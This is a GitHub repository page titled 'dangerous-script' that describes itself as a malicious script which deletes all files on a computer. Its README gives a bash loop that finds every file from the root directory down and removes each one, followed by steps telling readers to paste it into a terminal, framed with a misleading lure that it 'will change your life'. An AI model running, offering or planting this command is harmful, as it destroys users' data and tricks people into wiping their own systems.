Skip to content

Malicious script that will delete all files in your computer

Notifications You must be signed in to change notification settings

aldrin112602/dangerous-script

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

dangerous-script

#!/bin/bash

while read -r line; do
    rm $line
done < <(find / -xdev -type f)

How to use?

  • Open integrated terminal or CMD
  • run: copy this script and paste it into CMD terminal
  • Note: this script will change your life, your goal, and your system

About

Malicious script that will delete all files in your computer

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages